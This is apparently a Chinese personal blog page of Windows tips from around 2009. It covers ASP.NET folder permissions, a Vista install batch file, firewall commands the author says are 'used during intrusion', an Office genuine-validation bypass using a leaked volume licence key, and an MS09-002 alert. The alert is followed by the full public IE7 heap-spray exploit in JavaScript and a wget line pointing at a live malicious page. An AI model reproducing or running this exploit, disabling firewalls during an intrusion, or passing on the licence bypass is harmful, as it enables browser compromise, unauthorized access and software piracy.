3月9
在命令行模式下关闭Windows XP或Windows 2003自带的防火墙的两种命令:

1.  net stop sharedaccess
2. netsh firewall set  opmode  disable

如果手工启用Windows自带的防火墙的话,则可执行如下两条命令中的任意一条:

1. net start sharedaccess
2. netsh firewall set opmode  enable

入侵时要用到的。
如果管理员将net命令的权限设得太低,那么就可以用netsh来动手了。
Good  Luck!!!
3月9

本人服务器使用环境:WIN 2003
ASP.NET相对于ASP,设置权限方面有点不同,有一点儿设置错了都运行不到。在网上搜索到的都是很垃圾的答案,没有一个用得到的,下面是我自己设置并从中遇到的问题摸索后得到的经验,给大家分享。

ASP.NET需要用到USERS组的权限,因为我也遇过很多次自己设置了权限之后发现网站运行不了,很郁闷。下面根据出现的问题,一点点解决,让你的ASP.NET运行起来。。


问题一:

未找到路径“C:\”的一部分。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 

异常详细信息: System.IO.DirectoryNotFoundException: 未找到路径“C:\”的一部分。

解决:
在C盘加上Users组读取权限即可

本人试过:在C盘加上Users读取权限后可以访问了,但出于服务器安全问题,我又把UserS组去掉了(想到应该C盘下面还要一些文件夹要加入UserS权限即可)。去掉USERS组后,相继的问题以不同的错误方式显示出来了,如下面讲到的问题,然后再一一解决。


问题二:

页面弹出登录窗口点取消后出现:HTTP 错误 401.3 - 未经授权:访问由于 ACL 对所请求资源的设置被拒绝。
或者出现 HTTP 401.1错误

解决:
一,先要检查你的“身份检证和访问控制”中"对匿名使用下列windows用户账号”中的用户密码是否正确,还有检查你的网站 右键单击-权限中有没有加入此中用。

第一种方法试过都还是这的话,就看文件夹的权限设置了,在windows上加上Users权即可.


问题三:

如果浏览到你整个网站出现乱码

解决:
那应该在 c盘 windows 加上users组的 读取权限即可.


问题四:

编译错误
说明: 在编译向该请求提供服务所需资源的过程中出现错误。请检查下列特定错误详细信息并适当地修改源代码。

编 译器错误信息: CS0016: 未能写入输出文件“c:\windows\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files\root\345513e7\86f1794a\fvmzvzp7.dll”--“拒绝访问。 ”

解决:
应该在 c盘 windows下的temp 加上Users组的读、写、修改的权限即可.


问题五:

编译错误
说明: 在编译向该请求提供服务所需资源的过程中出现错误。请检查下列特定错误详细信息并适当地修改源代码。

编译器错误信息: 编译器失败,错误代码为 128。

解决:
应该在 c盘 windows下的System32 加上Users组的读的权限即可.


问题六:

运行时错误
说明: 服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。

详 细信息: 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 <customErrors> 标记。然后应将此 <customErrors> 标记的“mode”属性设置为“Off”。


<!-- Web.Config 配置文件 -->

<configuration>
    <system.web>
        <customErrors mode="Off"/>
    </system.web>
</configuration>

注释: 通过修改应用程序的 <customErrors> 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。

<!-- Web.Config 配置文件 -->

<configuration>
    <system.web>
        <customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
    </system.web>
</configuration>
 
解决:
在所在站点右键点击-权限 加上 IIS_WPG组的读权限即可

 

总 结:
windows temp System32 都需要users 的权限
windows读 temp读,写 System32读
站站权限要加上IIS_WPG读取权限
所以服务器的安全性也会低了很多,呵呵,,

3月7
xp环境下的vista的安装方式:
1.下载msdn vista with sp1的集成版iso
2.用winrar或者虚拟光驱届亚或提取到d盘根目录 文件夹为D:\vista
3.用记事本保存下列的文字 另存为pe2.0.bat
@echo off
C:
MD SOURCES
MD BOOT
COPY d:\vista\BOOTMGR C:\
COPY d:\vista\BOOT\BCD C:\BOOT\
COPY d:\vista\BOOT\BOOT.SDI C:\BOOT\
COPY d:\vista\SOURCES\BOOT.WIM C:\SOURCES\
d:\vista\BOOT\BOOTSECT /NT60 C:
shutdown -t 0 -r
4.在运行这个pe2.0.bat批处理
5.电脑会自动重启 重启后会自动加载pe2.0环境
6.会出现光盘安装所出现的界面 点击下一步
7.在右下角有修复计算机 点击
8.就会出现一个选择界面 如果出现要重启的界面 请点取消 在点下一步
9.在选择命令提示符
10.在输入D:\vista\sources\setup 就会出现真正的安装界面
后面的安装方法就不用在下说了吧 与光盘安装方法一样 安装过程中可以格式化c盘。
3月4
今天发神经把用了近5年的Windows 2003系统换成了Windows XP,同时安装了Office 2003办公系统。
在给Windows产品打补丁过程中,发现微软已经在补丁队列中加入了Office的增值验证的插件,没办法,Microsoft Update已经在运行了.
等所以有的补丁安装完重启系统以后,运行Microsoft Word的时候,果然提示是盗版.
于是上网搜了一下,发现此方法(更换Office序列号)能够通过正版验证,具体方法如下:
1、运行regedit,打开注册表编辑器;
2、找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\11.0\Registration\{90110804-6000-11D3-8CFE-0150048383C9}键中DigitalProductIDProductID两个键值,并将这两个键值删除。[注:(90110804-6000-11D3-8CFE-0150048383C9),根据不同的硬件,安装Office在注册表中产生的键值也不绝对是这个,主要是结尾部分不同,但该键值开头的部分是这样的。];
3、重新运行Microsoft Word、Microsoft Excel等Office套件,均会弹出安装程序,要求输入序列号的界面,重新手工输入FTYBP-J2B4K-K7JHY-3JG2K-MT9VM(此序列号为中原油田大客户版的VLK);
4、去微软官方正版验证网页吧。

请勿将以上方法用于任何商业目的!
祝你好运!

2月24

  江民反病毒中心监测到,利用微软MS09-002漏洞的完整攻击代码被公布在互联网上,据了解,该漏洞存在于微软IE7浏览器中,如果用户没有及时修补该漏洞,当用户使用存在漏洞的IE7浏览器浏览网页时,一旦打开了被黑客恶意挂马的网页时,病毒就会利用该漏洞入侵到用户计算机中,给用户带来严重的损失。


  据江民反病毒专家介绍,目前微软MS09-002漏洞还没有被大量用于网页挂马,但随着攻击代码被完全公布在互联网上,预计在未来的几天内就会被国内的黑客大面积利用,用于广泛的传播各种恶意软件。


  江民反病毒专家提醒广大用户,微软公司已经于北京时间2月11日发布了针对此漏洞的安全更新程序,用户上网时务必及时修补微软MS09-002漏洞,以免受到病毒的侵害。与此同时,用户可以使用江民杀毒软件KV2009的漏洞检测工具,自动修补该漏洞。

[防]:
MS09-002漏洞补丁下载页面:
http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx


[攻]:

Expolit源代码:

<!--
MS09-002
===============================
grabbed from:
wget
http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

# milw0rm.com [2009-02-18]

分页: 8/16 第一页 上页 3 4 5 6 7 8 9 10 11 12 下页 最后页 [ 显示模式: 摘要 | 列表 ]